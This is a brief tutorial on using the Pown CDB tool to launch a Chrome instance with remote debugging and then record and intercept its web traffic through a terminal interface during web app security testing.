Let's explore how to use Pown CDB during a typical web app security engagments.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB we need a Chrome browser instance (other browsers are also supported) with chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.



❌